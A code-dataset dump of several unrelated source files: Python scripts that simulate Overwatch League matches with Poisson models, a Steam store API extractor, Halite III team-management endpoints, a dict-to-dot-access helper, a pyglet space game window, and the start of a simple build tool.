t.assaultAtk = (float(t.assaultPts)/float(t.assaultPlayed))/leagueAssaultRatio
t.assaultDef = (float(t.assaultPtsLost)/float(t.assaultPlayed))/leagueAssaultRatio
t.hybridAtk = (float(t.hybridPts)/float(t.hybridPlayed))/leagueHybridRatio
t.hybridDef = (float(t.hybridPtsLost)/float(t.hybridPlayed))/leagueHybridRatio
t.controlAtk = (float(t.controlPts)/float(t.controlPlayed))/leagueControlRatio
t.controlDef = (float(t.controlPtsLost)/float(t.controlPlayed))/leagueControlRatio
print "{:<24s}{:>10.2f}-{:<6.2f}{:>10.2f}-{:<6.2f}{:>10.2f}-{:<6.2f}{:>10.2f}-{:<6.2f}".format(t.name, t.escortAtk, t.escortDef, t.assaultAtk, t.assaultDef, t.hybridAtk, t.hybridDef, t.controlAtk, t.controlDef)
print "----------------------------------------------------------------------------------------------"
print ""
print control_hist.awayPts.bins
print control_hist.homePts.bins
print
print assault_hist.awayPts.bins
print assault_hist.homePts.bins
print
print hybrid_hist.awayPts.bins
print hybrid_hist.homePts.bins
print
print escort_hist.awayPts.bins
print escort_hist.homePts.bins
plt.figure()
plt.plot(control_hist.homePts.bins, '-g', label='home')
plt.plot(control_hist.awayPts.bins, '--or', label='away')
plt.title('control')
plt.legend()
plt.grid()
plt.figure()
plt.plot(assault_hist.homePts.bins, '-g', label='home')
plt.plot(assault_hist.awayPts.bins, '--or', label='away')
plt.title('assault')
plt.legend()
plt.grid()
plt.figure()
plt.plot(hybrid_hist.homePts.bins, '-g', label='home')
plt.plot(hybrid_hist.awayPts.bins, '--or', label='away')
plt.title('hybrid')
plt.legend()
plt.grid()
plt.figure()
plt.plot(escort_hist.homePts.bins, '-g', label='home')
plt.plot(escort_hist.awayPts.bins, '--or', label='away')
plt.title('escort')
plt.legend()
plt.grid()
# plt.show()
#####################################
## time to simulate some matches...
#####################################
# TODO: Use the streak information to help weight probability? Currently it ins't being set. It was removed when
# accumulating points from the 'schedule' endpoint instead of the 'team/ID' endpoint.
# get the games for the stages
currentStgIdx = 4
response = dm.fetchData('schedule')
stages = response['data']['stages']
matches = stages[currentStgIdx]['matches']
limit = 3
N = 10
#for m in matches:
j = 0
while j < N:
i = 0
while i < limit:
m = matches[i]
home = m['competitors'][0]
away = m['competitors'][1]
home = league.getTeam(home['id'])
away = league.getTeam(away['id'])
homeScore = 0
awayScore = 0
print '{:20s} vs. {:20s}'.format(home.name, away.name)
games = m['games']
for g in games:
map = g['attributes']['map']
if map in ESCORT:
homepts = poisson.rvs(home.escortAtk*away.escortDef*leagueEscortRatio)
awaypts = poisson.rvs(away.escortAtk*home.escortDef*leagueEscortRatio)
print "\tEscrot:{:d}-{:d}".format(homepts, awaypts)
if awaypts <= homepts:
homeScore += 1
else:
awayScore += 1
if map in ASSAULT:
homepts = poisson.rvs(home.assaultAtk * away.assaultDef * leagueAssaultRatio)
awaypts = poisson.rvs(away.assaultAtk * home.assaultDef * leagueAssaultRatio)
print "\tAssault:{:d}-{:d}".format(homepts, awaypts)
if awaypts < homepts:
homeScore += 1
elif awaypts > homepts:
awayScore += 1
if map in HYBRID:
homepts = poisson.rvs(home.hybridAtk * away.hybridDef * leagueHybridRatio)
awaypts = poisson.rvs(away.hybridAtk * home.hybridDef * leagueHybridRatio)
print "\tHybrid:{:d}-{:d}".format(homepts, awaypts)
if awaypts < homepts:
homeScore += 1
elif awaypts > homepts:
awayScore += 1
if map in CONTROL:
homepts = poisson.rvs(home.controlAtk * away.controlDef * leagueControlRatio)
awaypts = poisson.rvs(away.controlAtk * home.controlDef * leagueControlRatio)
print "\tControl:{:d}-{:d}".format(homepts, awaypts)
if awaypts <= homepts:
homeScore += 1
else:
awayScore += 1
if homeScore == awayScore:
homepts = poisson.rvs(home.controlAtk * away.controlDef * leagueControlRatio)
awaypts = poisson.rvs(away.controlAtk * home.controlDef * leagueControlRatio)
print "\tControl:{:d}-{:d}".format(homepts, awaypts)
if awaypts <= homepts:
homeScore += 1
else:
awayScore += 1
print "\tFinal:{:d}-{:d}".format(homeScore, awayScore)
# tally up the score for the this game...
isTeam1 = True if homeScore > awayScore else False
if isTeam1:
home.simResults["W"] += 1
away.simResults["L"] += 1
else:
home.simResults["L"] += 1
away.simResults["W"] += 1
home.simResults["wins"] += homeScore
home.simResults["loss"] += awayScore
away.simResults["wins"] += awayScore
away.simResults["loss"] += homeScore
print ""
i+=1
j += 1
print "done with sim #{:d}".format(j)
```
#### File: overwatch-league-skill/OWLMonteCarlo/sim_from_file.py
```python
import os, sys, json, requests
import datetime as dt
import time
import numpy as np
from scipy.stats import poisson
import matplotlib.pyplot as plt
SOURCE = "FILE"
ESCORT = ['junkertown', 'dorado', 'route-66', 'gibraltar']
ASSULT = ['hanamura', 'volskaya', 'temple-of-anubis', 'horizon-lunar-colony']
HYBRID = ['kings-row', 'numbani', 'hollywood', 'eichenwalde', 'blizzard-world']
CONTROL = ['nepal', 'ilios', 'lijiang', 'oasis']
TEAM_ID = {
'4523' : 'fuel',
'4524' : 'fusion',
'4525' : 'outlaws',
'4402' : 'uprising',
'4403' : 'excelsior',
'4404' : 'shock',
'4405' : 'valiant',
'4406' : 'gladiators',
'4407' : 'mayhem',
'4408' : 'dragons',
'4409' : 'dynasty',
'4410' : 'spitfire'
}
class dataManager:
def __init__(self, root=None, src=SOURCE, ext='.json'):
self.root = root
self.src = src
self.ext = ext
def fetchData(self, route):
url = os.path.join(self.root, route)
if self.src == "NETWORK":
# fetch from network url and json decode
r = requests.get(url).json()
else:
# open json file
fp = open(url+self.ext, 'r')
r = json.load(fp)
return r
class WL_hist:
def __init__(self, min, max):
self.w = simple_hist(min, max)
self.l = simple_hist(min, max)
def bin_w(self, val):
self.w.bin(val)
def bin_l(self, val):
self.l.bin(val)
class simple_hist:
def __init__(self, min, max):
self.min = min
self.max = max
self.bins = np.zeros(int(max - min))
def bin(self, value):
self.bins[value] += 1
class league:
def __init__(self):
self.teams = []
def addTeam(self, team):
self.teams.append(team)
def getTeam(self, id):
if len(self.teams) == 0:
return None
for i in range(0, len(self.teams)):
t = self.teams[i]
if t.id == id:
return t
print "Team not found..."
return None
def printOverallStandings(self):
print '{:<6s}{:<24s} W-L MAP W-L-T'.format("ID", "Name")
print "--------------------------------------------------"
for t in self.teams:
print '{:<6d}{:<24s} {:2d}-{:<2d} {:2d}-{:2d}-{:<2d}'.format(t.id, t.name, t.W, t.L, t.wins, t.loss,
t.tie)
print "--------------------------------------------------"
print '{:<6s}{:<24s} MAP {:<3d}-{:<3d}-{:2d}'.format("####", "League Totals", totalPtsWin, totalPtsLoss,
totalPtsTie)
print ""
class team:
def __init__(self, obj):
self.name = obj['competitor']['name']
self.id = obj['competitor']['id']
self.place = obj['placement']
record = obj['records'][0]
self.wins = record['gameWin']
self.loss = record['gameLoss']
self.tie = record['gameTie']
self.W = record['matchWin']
self.L = record['matchLoss']
self.simResults = {
"wins" : 0,
"loss" : 0,
"tie" : 0,
"W" : 0,
"L" : 0
}
self. matchesPlayed = 0
self.streak = 0
self.escortPts = 0
self.escortPtsLost = 0
self.escortPlayed = 0
self.hybridPts = 0
self.hybridPtsLost = 0
self.hybridPlayed = 0
self.controlPts = 0
self.controlPtsLost = 0
self.controlPlayed = 0
self.assultPts = 0
self.assultPtsLost = 0
self.assultPlayed = 0
self.escortAtk = 0
self.escortDef = 0
self.hybridAtk = 0
self.hybridDef = 0
self.controlAtk = 0
self.controlDef = 0
self.assultAtk = 0
self.assultDef = 0
league = league()
totalPtsWin = 0
totalPtsLoss = 0
totalPtsTie = 0
team1Pts = 0
team2Pts = 0
team1Matches = 0 # team1 matches == team2 matches == matches played (hopefully) maybe matches concluded?
team2Matches = 0
totalEscortPts = 0
totalEscortPlayed = 0
totalAssultPts = 0
totalAssultPlayed = 0
totalHybridPts = 0
totalHybridPlayed = 0
totalControlPts = 0
totalControlPlayed = 0
matchesConcluded = 0
matchesPlayed = 0 # there is a discrepancy between matches played and matches concluded because of season stage finals and preseason
escort_hist = WL_hist(0,10)
hybrid_hist = WL_hist(0,10)
control_hist = WL_hist(0,4)
assult_hist = WL_hist(0,10)
# initialize the data source information
if SOURCE == "NETWORK":
rootURL = 'https://api.overwatchleague.com'
else:
rootURL = './data'
dm = dataManager(rootURL)
# Get team standings and initialize league
response = dm.fetchData('standings')
ranks = response['ranks']
for rank in ranks:
t = team(rank)
league.addTeam(t)
totalPtsWin += t.wins
totalPtsLoss += t.loss
totalPtsTie += t.tie
league.printOverallStandings()
# get the number of matches played... figured it was better to get it from the API
response = dm.fetchData('ranking')
matchesConcluded = response['matchesConcluded']
# Now get all the matches played by the team and fill in their map type scores
now = int(time.time()*1000)
for t in league.teams:
print 'Processing matches for {:s}...'.format(t.name)
response = dm.fetchData('teams/{:d}'.format(t.id))
t.streak = response['ranking']['streakNum']
matches = response['schedule']
matches = sorted(matches, key= lambda x: x['startDate'])
i = 0
m = matches[i]
while m['state'] == "CONCLUDED" or m['state'] == "CONCLUDED_BYE":
competitors = m['competitors']
isTeam1 = True if t.id == competitors[0]['id'] else False
games = m['games']
# first breakdown breakdown scores by map type
for g in games:
if g['state'] == "CONCLUDED":
gAttrs = g['attributes']
mapType = gAttrs['map']
if mapType in ESCORT:
t.escortPts += gAttrs['mapScore']['team1'] if isTeam1 else gAttrs['mapScore']['team2']
t.escortPtsLost += gAttrs['mapScore']['team2'] if isTeam1 else gAttrs['mapScore']['team1']
escort_hist.bin_w(gAttrs['mapScore']['team1'] if isTeam1 else gAttrs['mapScore']['team2'])
escort_hist.bin_l(gAttrs['mapScore']['team2'] if isTeam1 else gAttrs['mapScore']['team1'])
t.escortPlayed += 1
totalEscortPlayed += 1
if mapType in ASSULT:
t.assultPts += gAttrs['mapScore']['team1'] if isTeam1 else gAttrs['mapScore']['team2']
t.assultPtsLost += gAttrs['mapScore']['team2'] if isTeam1 else gAttrs['mapScore']['team1']
assult_hist.bin_w(gAttrs['mapScore']['team1'] if isTeam1 else gAttrs['mapScore']['team2'])
assult_hist.bin_l(gAttrs['mapScore']['team2'] if isTeam1 else gAttrs['mapScore']['team1'])
t.assultPlayed += 1
totalAssultPlayed += 1
if mapType in HYBRID:
t.hybridPts += gAttrs['mapScore']['team1'] if isTeam1 else gAttrs['mapScore']['team2']
t.hybridPtsLost += gAttrs['mapScore']['team2'] if isTeam1 else gAttrs['mapScore']['team1']
hybrid_hist.bin_w(gAttrs['mapScore']['team1'] if isTeam1 else gAttrs['mapScore']['team2'])
hybrid_hist.bin_l(gAttrs['mapScore']['team2'] if isTeam1 else gAttrs['mapScore']['team1'])
t.hybridPlayed += 1
totalHybridPlayed += 1
if mapType in CONTROL:
t.controlPts += gAttrs['mapScore']['team1'] if isTeam1 else gAttrs['mapScore']['team2']
t.controlPtsLost += gAttrs['mapScore']['team2'] if isTeam1 else gAttrs['mapScore']['team1']
control_hist.bin_w(gAttrs['mapScore']['team1'] if isTeam1 else gAttrs['mapScore']['team2'])
control_hist.bin_l(gAttrs['mapScore']['team2'] if isTeam1 else gAttrs['mapScore']['team1'])
t.controlPlayed += 1
totalControlPlayed += 1
#then tally the match score for the league to have an overall atk/defense score to
# compare to individual maps
team1Pts += m['scores'][0]['value']
team2Pts += m['scores'][1]['value']
t.matchesPlayed += 1
i += 1
m = matches[i]
print ""
# Print total points scored by team and the league
print '{:<24s}{:<14s}{:<14s}{:<14s}{:<14s}'.format("Name", "Escort W-L", "Assult W-L", "Hybrid W-L", "Control W-L")
print "---------------------------------------------------------------------------"
for t in league.teams:
print '{:<24s}{:>6d}-{:<6d}{:>6d}-{:<6d}{:>6d}-{:<6d}{:>6d}-{:<6d}'.format(t.name, t.escortPts, t.escortPtsLost, t.assultPts, t.assultPtsLost, t.hybridPts, t.hybridPtsLost, t.controlPts, t.controlPtsLost)
totalEscortPts += t.escortPts
totalAssultPts += t.assultPts
totalHybridPts += t.hybridPts
totalControlPts += t.controlPts
print "---------------------------------------------------------------------------"
print '{:<24s}{:<16d}{:<16d}{:<16d}{:<16d}'.format("League Totals", totalEscortPts, totalAssultPts, totalHybridPts, totalControlPts)
# Calculate strengths
leagueEscortRatio = float(totalEscortPts)/float(totalEscortPlayed)
leagueAssultRatio = float(totalAssultPts)/float(totalAssultPlayed)
leagueHybridRatio = float(totalHybridPts)/float(totalHybridPlayed)
leagueControlRatio = float(totalControlPts)/float(totalControlPlayed)
print "total escort pts", totalEscortPts
print "total escort played", totalEscortPlayed
print leagueEscortRatio
print
print "total control pts", totalControlPts
print "total control played", totalControlPlayed
print leagueControlRatio
print ""
print "{:<24s}{:<20s}{:<20s}{:<20s}{:<20s}".format("Name", "Escort Atk-Def", "Assult Atk-Def", "Hybrid Atk-Def", "Control Atk-Def")
print "-----------------------------------------------------------------------------------------"
for t in league.teams:
t.escortAtk = (float(t.escortPts)/float(t.escortPlayed))/leagueEscortRatio
t.escortDef = (float(t.escortPtsLost)/float(t.escortPlayed))/leagueEscortRatio
t.assultAtk = (float(t.assultPts)/float(t.assultPlayed))/leagueAssultRatio
t.assultDef = (float(t.assultPtsLost)/float(t.assultPlayed))/leagueAssultRatio
t.hybridAtk = (float(t.hybridPts)/float(t.hybridPlayed))/leagueHybridRatio
t.hybridDef = (float(t.hybridPtsLost)/float(t.hybridPlayed))/leagueHybridRatio
t.controlAtk = (float(t.controlPts)/float(t.controlPlayed))/leagueControlRatio
t.controlDef = (float(t.controlPtsLost)/float(t.controlPlayed))/leagueControlRatio
print "{:<24s}{:>10.2f}-{:<6.2f}{:>10.2f}-{:<6.2f}{:>10.2f}-{:<6.2f}{:>10.2f}-{:<6.2f}".format(t.name, t.escortAtk, t.escortDef, t.assultAtk, t.assultDef, t.hybridAtk, t.hybridDef, t.controlAtk, t.controlDef)
print "-----------------------------------------------------------------------------------------"
print ""
print control_hist.w.bins
print control_hist.l.bins
print
print assult_hist.w.bins
print assult_hist.l.bins
print
print hybrid_hist.w.bins
print hybrid_hist.l.bins
print
print escort_hist.w.bins
print escort_hist.l.bins
plt.figure()
plt.plot(control_hist.w.bins, '-g', label='wins')
plt.plot(control_hist.l.bins, '--or', label='losses')
plt.title('control')
plt.figure()
plt.plot(assult_hist.w.bins, '-g', label='wins')
plt.plot(assult_hist.l.bins, '--or', label='losses')
plt.title('assult')
plt.figure()
plt.plot(hybrid_hist.w.bins, '-g', label='wins')
plt.plot(hybrid_hist.l.bins, '--or', label='losses')
plt.title('hybrid')
plt.figure()
plt.plot(escort_hist.w.bins, '-g', label='wins')
plt.plot(escort_hist.l.bins, '--or', label='losses')
plt.title('escort')
# plt.show()
#####################################
## time to simulate some matches...
#####################################
# get the games for the stages
currentStgIdx = 4
response = dm.fetchData('schedule')
stages = response['data']['stages']
matches = stages[currentStgIdx]['matches']
limit = 3
N = 10
#for m in matches:
j = 0
while j < N:
i = 0
while i < limit:
m = matches[i]
home = m['competitors'][0]
away = m['competitors'][1]
home = league.getTeam(home['id'])
away = league.getTeam(away['id'])
homeScore = 0
awayScore = 0
print '{:20s} vs. {:20s}'.format(home.name, away.name)
games = m['games']
for g in games:
map = g['attributes']['map']
if map in ESCORT:
homepts = poisson.rvs(home.escortAtk*away.escortDef*leagueEscortRatio)
awaypts = poisson.rvs(away.escortAtk*home.escortDef*leagueEscortRatio)
print "\tEscrot:{:d}-{:d}".format(homepts, awaypts)
if awaypts <= homepts:
homeScore += 1
else:
awayScore += 1
if map in ASSULT:
homepts = poisson.rvs(home.assultAtk * away.assultDef * leagueAssultRatio)
awaypts = poisson.rvs(away.assultAtk * home.assultDef * leagueAssultRatio)
print "\tAssult:{:d}-{:d}".format(homepts, awaypts)
if awaypts < homepts:
homeScore += 1
elif awaypts > homepts:
awayScore += 1
if map in HYBRID:
homepts = poisson.rvs(home.hybridAtk * away.hybridDef * leagueHybridRatio)
awaypts = poisson.rvs(away.hybridAtk * home.hybridDef * leagueHybridRatio)
print "\tHybrid:{:d}-{:d}".format(homepts, awaypts)
if awaypts < homepts:
homeScore += 1
elif awaypts > homepts:
awayScore += 1
if map in CONTROL:
homepts = poisson.rvs(home.controlAtk * away.controlDef * leagueControlRatio)
awaypts = poisson.rvs(away.controlAtk * home.controlDef * leagueControlRatio)
print "\tControl:{:d}-{:d}".format(homepts, awaypts)
if awaypts <= homepts:
homeScore += 1
else:
awayScore += 1
if homeScore == awayScore:
homepts = poisson.rvs(home.controlAtk * away.controlDef * leagueControlRatio)
awaypts = poisson.rvs(away.controlAtk * home.controlDef * leagueControlRatio)
print "\tControl:{:d}-{:d}".format(homepts, awaypts)
if awaypts <= homepts:
homeScore += 1
else:
awayScore += 1
print "\tFinal:{:d}-{:d}".format(homeScore, awayScore)
# tally up the score for the this game...
isTeam1 = True if homeScore > awayScore else False
if isTeam1:
home.simResults["W"] += 1
away.simResults["L"] += 1
else:
home.simResults["L"] += 1
away.simResults["W"] += 1
home.simResults["wins"] += homeScore
home.simResults["loss"] += awayScore
away.simResults["wins"] += awayScore
away.simResults["loss"] += homeScore
print ""
i+=1
j += 1
print "done with sim #{:d}".format(j)
``` |
{
"source": "jpbusche/ExtractorAPI",
"score": 3
} |
#### File: src/ext/steam_api.py
```python
from ext.extractor import Extractor, GameNotFound
class SteamAPI(Extractor):
url = 'https://store.steampowered.com/api/appdetails/?appids={}&cc=pt-br'
def get_game(self, identifier, flag):
response = self.get_api(identifier)
data = response[str(identifier)]
if data['success'] and data is not None:
if flag == 'estastic':
result = self.manipulate_data_est(data['data'])
return result
elif flag == 'temporal':
result = self.manipulate_data_tmp(data['data'], identifier)
return result
else:
raise DataTypeNotFound('Data type not found!!!')
else:
raise GameNotFound("Game not found!!!")
def manipulate_data_est(self, data):
result = {}
result['release_date']= {}
result['genres'] = []
result['publishers'] = []
result['developers'] = []
result['platforms'] = []
result['screenshots'] = []
result['name'] = data['name']
result['steam_id'] = data['steam_appid']
result['description'] = data['about_the_game']
result['header_image'] = data['header_image']
result['background_image'] = data['background']
if data['website'] is not None:
result['website'] = data['website']
else:
result['website'] = ""
if 'genres' in data:
for gnr in data['genres']:
result['genres'].append(gnr['description'])
for pbl in data['publishers']:
result['publishers'].append(pbl)
if 'developers' in data:
for dvp in data['developers']:
result['developers'].append(dvp)
for plt in data['platforms']:
if data['platforms'][plt]: result['platforms'].append(str(plt).capitalize())
if data['release_date']['date'] != "":
date = data['release_date']['date'].split()
result['release_date']['release_month'] = date[1][:-1]
result['release_date']['release_year'] = int(date[2])
result['release_date']['release_day'] = int(date[0])
else:
result['release_date']['release_month'] = 'Set'
result['release_date']['release_year'] = 2003
result['release_date']['release_day'] = 12
if 'metacritic' in data:
result['metacritic_score'] = data['metacritic']['score']
else:
result['metacritic_score'] = 0
for screen in data['screenshots']:
result['screenshots'].append(screen['path_full'])
return result
def manipulate_data_tmp(self, data, identifier):
result = {}
if data['is_free'] or not 'price_overview' in data:
result['price'] = self.temporal_data(identifier, 0.0, 'price')
result['is_free'] = True
else:
result['price'] = self.temporal_data(identifier, data['price_overview']['final'] / 100, 'price')
result['is_free'] = False
return result
``` |
{
"source": "jpc133/Halite-III",
"score": 3
} |
#### File: apiserver/web/team.py
```python
import re
import secrets
import flask
import sqlalchemy
from profanity import profanity
import wordfilter
from .. import model, util
from . import util as web_util
from .blueprint import web_api
TEAM_NAME_REGEX = re.compile(r'^[a-zA-Z][a-zA-Z0-9_\-]*$')
TEAM_NAME_LENGTH = 32
def make_team_record(team, members, show_verification_code=False):
result = {
"team_id": team["id"],
"created": team["created"],
"name": team["name"],
"members": {},
"leader_id": team["leader_id"],
}
if show_verification_code:
result["verification_code"] = team["verification_code"]
for member in members:
record = {
"user_id": member["user_id"],
"is_leader": member["user_id"] == team["leader_id"],
"username": member["username"],
"player_level": member["player_level"],
"organization_id": member["organization_id"],
"organization_name": member["organization_name"],
"country_code": member["country_code"],
"country_subdivision_code": member["country_subdivision_code"],
"profile_image_key": member["oauth_profile_image_key"],
"oauth_provider": "github" if "oauth_provider" in member and member["oauth_provider"] == 1 else "unknown",
}
if member["user_id"] == team["leader_id"]:
result["num_submissions"] = member["num_submissions"]
result["score"] = member["score"]
result["mu"] = member["mu"]
result["sigma"] = member["sigma"]
result["rank"] = member["rank"]
result["members"][member["user_id"]] = record
return result
def get_team_members(conn, team):
return conn.execute(sqlalchemy.sql.select([
model.all_users.c.user_id,
model.all_users.c.username,
model.all_users.c.oauth_provider,
model.all_users.c.oauth_profile_image_key,
model.all_users.c.player_level,
model.all_users.c.organization_id,
model.all_users.c.organization_name,
model.all_users.c.country_code,
model.all_users.c.country_subdivision_code,
model.all_users.c.num_submissions,
model.all_users.c.score,
model.all_users.c.mu,
model.all_users.c.sigma,
model.all_users.c.rank,
]).select_from(
model.all_users
).where(
model.all_users.c.team_id == team["id"]
)).fetchall()
def get_team_helper(team_id, user_id=None):
with model.read_conn() as conn:
query = model.teams.select().where(
model.teams.c.id == team_id
).reduce_columns()
team = conn.execute(query).first()
if not team:
raise util.APIError(
404,
message="Team {} not found.".format(team_id))
members = get_team_members(conn, team)
return make_team_record(team, members,
show_verification_code=user_id == team["leader_id"])
def list_teams_helper(offset, limit, participant_clause,
where_clause, order_clause):
with model.read_conn() as conn:
query = model.teams.select().where(
where_clause &
sqlalchemy.sql.exists(model.users.select(
participant_clause &
(model.teams.c.id == model.users.c.team_id)
).correlate(model.teams))
).order_by(*order_clause).offset(offset).limit(limit).reduce_columns()
teams = conn.execute(query)
result = []
for team in teams.fetchall():
members = get_team_members(conn, team)
result.append(make_team_record(team, members))
return result
@web_api.route("/team", methods=["GET"])
@util.cross_origin(methods=["GET", "POST"])
def list_teams():
offset, limit = web_util.get_offset_limit()
where_clause, order_clause, manual_sort = web_util.get_sort_filter({
"id": model.teams.c.id,
"created": model.teams.c.created,
"name": model.teams.c.name,
}, ["member"])
participant_clause = sqlalchemy.true()
for (field, op, val) in manual_sort:
if field == "participant":
participant_clause &= op(model.users.c.id, val)
result = list_teams_helper(offset, limit,
participant_clause,
where_clause, order_clause)
return flask.jsonify(result)
@web_api.route("/team", methods=["POST"])
@util.cross_origin(methods=["GET", "POST"])
@web_util.requires_login()
def create_team(*, user_id):
if "name" not in flask.request.json:
raise util.APIError(400, message="Please provide a team name.")
# Validate team name
name = flask.request.json["name"]
if len(name) > TEAM_NAME_LENGTH or \
profanity.contains_profanity(name) or \
wordfilter.blacklisted(name) or \
not TEAM_NAME_REGEX.match(name):
raise util.APIError(400, message="Invalid team name. Team name must begin with an upper or lower case ASCII letter and may only contain up to {} alphanumeric characters plus dashes and underscores.".format(TEAM_NAME_LENGTH))
team_name = "Team " + name
verification_code = secrets.token_hex(16)
# Check if user is already on a team
with model.engine.begin() as conn:
if conn.execute(model.teams.select(sqlalchemy.sql.func.lower(model.teams.c.name) == team_name.lower())).first():
raise util.APIError(
400, message="That team name is taken, sorry.")
query = model.users.select((model.users.c.id == user_id) &
(model.users.c.team_id != None))
if conn.execute(query).first():
raise util.APIError(
400, message="You're already on a team.")
try:
team_id = conn.execute(model.teams.insert().values(
name=team_name,
verification_code=verification_code,
leader_id=user_id,
)).inserted_primary_key[0]
except sqlalchemy.exc.IntegrityError:
raise util.APIError(400, message="Duplicate team name.")
conn.execute(model.users.update().values(
team_id=team_id,
).where(model.users.c.id == user_id))
return util.response_success({
"team_id": team_id,
"verification_code": verification_code,
})
@web_api.route("/team/<int:team_id>", methods=["GET"])
@util.cross_origin(methods=["GET", "POST"])
@web_util.requires_login(optional=True)
def get_team(team_id, *, user_id=None):
# If user logged in, give them code
result = get_team_helper(team_id, user_id)
return flask.jsonify(result)
@web_api.route("/team/<int:team_id>/user", methods=["POST"])
@util.cross_origin(methods=["POST"])
@web_util.requires_login()
def associate_user_team(team_id, *, user_id):
verification_code = flask.request.form.get("verification_code")
if not verification_code:
raise util.APIError(
400,
message="Please provide the team's verification code."
)
with model.engine.connect() as conn:
team = conn.execute(model.teams.select(model.teams.c.id == team_id)).first()
if not team:
raise util.APIError(404, message="Team {} does not exist.".format(team_id))
if team["verification_code"] != verification_code:
raise util.APIError(403, message="Incorrect verification code.")
members = conn.execute(
model.users.select(model.users.c.team_id == team_id)
).fetchall()
if len(members) >= 4:
raise util.APIError(400, message="Team already has 4 members.")
for member in members:
if member["id"] == user_id:
raise util.APIError(400, message="You're already in this team.")
conn.execute(
model.challenges.update().where(
model.challenges.c.status != 'finished'
).values(
status="finished",
finished=sqlalchemy.sql.func.current_timestamp()
).where(
sqlalchemy.sql.exists(model.challenge_participants.select().where(
(model.challenge_participants.c.user_id == user_id) &
(model.challenge_participants.c.challenge_id == model.challenges.c.id)
))
)
)
# Remove user bots from matchmaking
conn.execute(model.bots.update().values(
compile_status=model.CompileStatus.DISABLED.value
).where(model.bots.c.user_id == user_id))
conn.execute(
model.users.update().values(
team_id=team_id,
).where(model.users.c.id == user_id))
return util.response_success()
# TODO: add /bot, /match endpoints that redirect to corresponding
# endpoints for team leader (with HTTP redirect?)
``` |
{
"source": "jpc4242/python-dict2dot",
"score": 4
} |
#### File: python-dict2dot/dict2dot/__init__.py
```python
import re
class Dict2Dot(dict):
'''
Dict2Dot class: "the main class"
Arguments:
(dictionary, optional): A preexistent dictionary may be passed
'''
def __init__(self, orig={}):
# Set a preexistent dict into self
for key, value in orig.items():
self.__setattr__(key, value)
def __getattr__(self, key):
# Return a value from the dict (even nested)
return self[key]
def __setattr__(self, key, value):
# Set values, including nested dicts, so that parent.child.son can be acessed
if isinstance(value, dict):
self[key] = Dict2Dot(value)
else:
self[key] = value
def dict(self) -> dict:
'''Return updated dictionary'''
return eval(str(self))
def __str__(self) -> str:
'''String representation of the dictionary'''
return re.sub('<Dict2Dot at \d+: ', '', re.sub('>', '', repr(self)))
def __repr__(self) -> str:
return f'<Dict2Dot at {id(self)}: {dict.__repr__(self)}>'
``` |
{
"source": "jpc644/blackjack_game",
"score": 4
} |
#### File: blackjack_game/test/blackjack_test.py
```python
from app.blackjack_game import draw_a_card
def test_draw_a_card():
deck=[
{2,"clubs",2,2,1},
{3,"clubs",3,3,1},
{4,"clubs",4,4,1},
{5,"clubs",5,5,1},
{6,"clubs",6,6,1},
{7,"clubs",7,7,1},
{8,"clubs",8,8,1},
{9,"clubs",9,9,1},
{10,"clubs",10,10,1}
]
card , deck = draw_a_card(deck)
#assert that the card is a dectionary and that it has certain keys we expect it to have
#count the number of remaining cards in active deck.
#assert that len is 1 less than deck was to start with to ensure we're removing a card from the deck
#indented within the test function
``` |
{
"source": "jpcallanta/spacecow",
"score": 3
} |
#### File: spacecow/lib/window.py
```python
import pyglet
from math import *
from random import randint
from lib.player import Player
from lib.enemy import Enemy
class Window(pyglet.window.Window):
player = None
enemy_qty = 100
enemy = []
label_mouse_xy = None
mouse_x = 0
mouse_y = 0
# Class initializer
def __init__(self, size_x, size_y, resize):
super(Window, self).__init__(resizable = resize, visible = True, vsync = False)
self.set_size(size_x, size_y)
self.set_caption('SpaceCow')
self.maximize()
self.player = Player((self.width / 2), (self.height / 2), 0, "resources/ship.png")
for enemies in range(self.enemy_qty):
self.enemy.append(Enemy((self.width / 2), (self.height / 2), 0, "resources/cow.png"))
for e in self.enemy:
e.x_pos = randint(0, self.width)
e.y_pos = randint(0, self.height)
e.rotation = randint(0, 360)
self.player.x_pos = self.width / 2
self.player.y_pos = self.height / 2
self.label_mouse_xy = pyglet.text.Label("Mouse Location")
self.play_bg_music()
def play_bg_music(self):
bg_music = pyglet.media.Player()
music = pyglet.media.load('resources/635964_A-Heros-Destiny.mp3')
bg_music.queue(music)
bg_music.eos_action = pyglet.media.Player.EOS_LOOP
bg_music.play()
def follow_mouse(self, player, timer, speed):
player.c_val = sqrt((self.mouse_x - player.x_pos) ** 2 + \
(self.mouse_y - player.y_pos) ** 2)
player.x_pos -= ((player.x_pos - self.mouse_x) / player.c_val * speed * timer)
player.y_pos -= ((player.y_pos - self.mouse_y) / player.c_val * speed * timer)
delta_x = player.x_pos - self.mouse_x
delta_y = player.y_pos - self.mouse_y
if player.c_val > 1.0:
player.rotation = atan2(delta_y, delta_x) / pi * 180 * -1
def follow(self, enemy, timer, speed):
enemy.c_val = sqrt((enemy.x_pos - self.player.x_pos) ** 2 + \
(enemy.y_pos - self.player.y_pos) ** 2)
enemy.x_pos -= ((enemy.x_pos - self.player.x_pos) / enemy.c_val * speed * timer)
enemy.y_pos -= ((enemy.y_pos - self.player.y_pos) / enemy.c_val * speed * timer)
delta_x = enemy.x_pos - self.player.x_pos
delta_y = enemy.y_pos - self.player.y_pos
if enemy.c_val > 1.0:
enemy.rotation = atan2(delta_y, delta_x) / pi * 180 * -1
def update(self, dt):
self.label_mouse_xy.text = \
"mouse_x: %d mouse_y: %d | player_x: %d player_y: %d | delta: %f | rotation: %f" % \
(self.mouse_x,
self.mouse_y,
self.player.x_pos,
self.player.y_pos,
self.player.c_val,
self.player.rotation)
self.follow_mouse(self.player, dt, self.player.speed)
for e in self.enemy:
self.follow(e, dt, 10)
def on_draw(self):
self.clear()
self.player.draw_player()
for e in self.enemy:
e.draw_player()
self.label_mouse_xy.draw()
def on_mouse_motion(self, x, y, dx, dy):
self.label_mouse_xy.x = 10.0
self.label_mouse_xy.y = 10.0
self.mouse_x = x
self.mouse_y = y
``` |
{
"source": "jpcaram/simplebuilder",
"score": 3
} |
#### File: simplebuilder/simplebuilder/simplebuilder.py
```python
import os
from typing import List, Dict
import logging
import sys
class CannotBuildError(Exception):
pass
class Builder:
ALWAYS = 1
"""Always run the task's action regardless of requirements and outputs."""
PRESENT = 2
"""Targets must be present for the task to be up to date."""
OLDER = 4
"""Targets must be older than requiring tasks targets for a task to
be considered up to date."""
IGNOREPRESENT = 8
"""If a requirement has the PRESENT flag, ignore its date."""
def __init__(self):
self.logger = logging.getLogger('Builder')
self.logger.propagate = False
